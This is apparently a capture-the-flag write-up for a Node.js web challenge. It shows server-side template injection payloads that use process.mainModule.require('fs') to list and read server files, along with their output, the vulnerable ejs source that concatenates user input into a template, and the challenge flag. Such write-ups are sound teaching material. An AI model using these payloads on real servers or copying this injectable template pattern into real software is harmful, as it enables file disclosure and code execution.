Tags: web node.js 

Rating:

it uses jade template engine.
and we can inject at "http://alieni.se:3003/render/inject_point".

http://alieni.se:3003/render/404 --> 404 is under construction...
http://alieni.se:3003/render/7\*7 --> 49 is under construction...
http://alieni.se:3003/render/root --> [object global] is under construction...
http://alieni.se:3003/render/root.process.mainModule.require('fs').readdirSync('.') --> Dockerfile,hellothere,hellothere-just-testing-again,index.js,node_modules,package.json,run_service.sh,templates is under construction...

we can get file list of current directory.

http://alieni.se:3003/render/root.process.mainModule.require('fs').readFileSync('index.js') --> we can read index.js, and it has flag.

```
var express = require('express');
var request = require("request");
var eval = require("eval");
var ejs = require('ejs');
var app = express();
var spawn = spawn = require('threads').spawn;

var bodyParser = require('body-parser');
app.use(bodyParser.urlencoded({
extended: true
}));

app.listen(3003, function () {
console.log('A temple jest app listening on port 3003!')
});

app.get('/render/:name', function (req, res, next) {
console.log(req.originalUrl);
var thread = spawn(function(input, done) {
var ejs = require('ejs');
flag = "SCTF{m3m0ry_l34k_Schm3m0ry_l34k}";
var html = ejs.render("<%= "+input.name+" %> is under construction...<%# "+("---"+flag).repeat(20)+" %>", {});
done(html);
});

//Hack to avoid for(;;){} hanging the whole server...
setTimeout(function(){thread.kill();try{res.send("timeout");}catch(z){}}, 3000);
thread.send({"name": req.params.name, flag: ""}).on("message", function(html){res.send(html)});
});

app.get('/', function(req, res, next){
return ejs.renderFile('./templates/index.ejs', function(err, data){res.send(data);});
});

app.get('/package.json', function(req, res, next){
res.sendfile('./package.json');
});
```

this is index.js source, and flag is "SCTF{m3m0ry_l34k_Schm3m0ry_l34k}"